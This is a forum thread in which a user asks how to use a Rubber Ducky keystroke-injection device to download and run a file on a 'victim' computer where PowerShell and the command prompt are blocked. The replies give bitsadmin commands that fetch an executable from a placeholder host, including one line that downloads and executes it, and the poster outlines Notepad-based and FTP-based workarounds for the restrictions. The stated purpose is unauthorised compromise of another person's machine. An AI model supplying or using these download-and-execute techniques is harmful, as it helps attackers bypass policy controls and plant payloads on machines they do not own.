Jump to content

Download a file WITHOUT powershell


Jni

Recommended Posts

HI, 

I want to use a RUBBER DUCKY to download a file but the problem is the victim computer is not administrator so I dont have acces to powershell or command prompt I test on eoptions is to use Internet Explorer but there is to much chance to fail. So I want the best way to do that.

Thanks for the help

Link to comment
Share on other sites

56 minutes ago, ThoughtfulDev said:

You can run powershell and cmd without admin privs or am i mistaken?

On personal home PC's yes, well most of the time. But on managed networks they can push policies that restrict use of cmd and powershell along with many other things.

Link to comment
Share on other sites

The Command Prompt is blocked but I got an idea to download a .vbs with Notepad why did I dont download the executable because it too slow. If dont know the technics it simple open notep press CTRL + O then put the URL gonna a download a file ten I save with .vbs extension now I need to find a way to open the file and the file is on a host exe file I dont file any hosting accept .exe file.

Link to comment
Share on other sites

You could use Bitsadmin.

Download on the current directory

bitsadmin /transfer "job" https://foo.com/bar.exe "%cd%\bar.exe"

Download to specified directory

bitsadmin /transfer "job" https://foo.com/bar.exe "C:\folder\bar.exe"

Download and then execute

cmd.exe /c "bitsadmin /transfer job https://foo.com/bar.exe C:\folder\bar.exe&start bar.exe"

 

 

Edited by kbeflo
Link to comment
Share on other sites

I think I got an idea I am gone a use the FTP in run command but I want to know if it possible to put everything in the run command like the username, passsword, get file.exe. I dont want to use DELAY because the wifi of my victim Is REALLY SLOW. Thanks for the help 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...